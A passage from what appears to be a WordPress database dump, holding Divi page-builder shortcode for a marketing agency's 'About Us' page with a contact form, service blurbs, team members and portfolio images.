button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field fullwidth_field=\"on\" _builder_version=\"4.5.2\" _module_preset=\"default\" field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" hover_enabled=\"0\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','about-us','','inherit','closed','closed','','392-revision-v1','','','2020-08-07 18:50:18','2020-08-07 18:50:18','',392,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/392-revision-v1/',0,'revision','',0),(544,1,'2020-08-07 19:05:12','2020-08-07 19:05:12','[et_pb_section fb_built=\"1\" admin_label=\"Page Header\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>About US</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"About Us Section\" _builder_version=\"4.5.2\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/WhyWE.jpg\" custom_margin=\"|5%||5%\" custom_margin_tablet=\"\" custom_margin_phone=\"|0px||0px\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%|||\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"5%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-200px\" box_shadow_color=\"#ffffff\" alt=\"about WhatTheHell?\" title_text=\"whatthehell about us\" parallax=\"on\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"About Us Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"27px|0px|0px|0px\"][et_pb_column type=\"2_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_color=\"#f7f7f7\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"10%|10%|10%|10%\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_vertical=\"15px\" box_shadow_blur=\"45px\" box_shadow_color=\"rgba(0,0,0,0.15)\" locked=\"off\"]<h2>Building the future</h2>\r\n<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis iste natus sit voluptatem accusantium doloremque laudantium totam rem aperiam, eaque ipsa quae ab.</p>\r\n<p>Illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. <span style=\"font-size: 16px;\">Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit, sed quia non numquam eius modi tempora incidunt ut labore et dolore magnam aliquam quaerat voluptatem.</span></p>\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"110px|0px|110px|0px\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"4%\" animation_starting_opacity=\"100%\" locked=\"off\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_font=\"||||||||\" text_text_color=\"#353740\" text_font_size=\"24px\" text_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. Fusce ipsum enim, <strong>ultrices at ante sollicitudin</strong>, faucibus hendrenunc. Nullam tempor nulla eu imperdiet interdum.</span></p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#d4b068\" background_color_gradient_end=\"#ffffff\" background_color_gradient_start_position=\"30%\" background_color_gradient_end_position=\"30%\" custom_padding=\"0px||110px|\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"0px|0px|0px|0px\" animation_direction=\"top\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=GQB6K7Dozms\" image_src=\"//i.ytimg.com/vi/GQB6K7Dozms/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Team Member Section\" _builder_version=\"3.22\" custom_padding=\"110px||60px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#353740\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Fearless Leaeders</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||15px|\" hover_enabled=\"0\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Dhiraj Kumar\" position=\"Founder\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard.jpg\" linkedin_url=\"https://www.linkedin.com/in/dhirajwth\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" hover_enabled=\"0\" alt=\"dhiraj kumar founder \" title_text=\"dhiraj kumar whatthehell?\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Christina Foster\" position=\"Creative Director\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-06.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"100ms\" hover_enabled=\"0\" locked=\"off\" alt=\"dhiraj kumar founder \" title_text=\"travel-portrait-06\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Jason Wardak\" position=\"Visual Media\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-04.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"200ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Other Recent Works Section\" _builder_version=\"3.22\" background_color=\"#353740\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#d4b068\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_color=\"#d4b068\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#d4b068\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>our Work</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#f7f7f7\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" admin_label=\"Other Recent Works Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Packaging Design\" title_text=\"packaging design by what the hell\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Packaging Design creative agency\" title_text=\"packaging design creative advertising agency\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\" alt=\"Creative graphic designing \" title_text=\"Creative graphic designing \"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"View All\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#f7f7f7\" button_border_width=\"4px\" button_border_color=\"#f7f7f7\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" 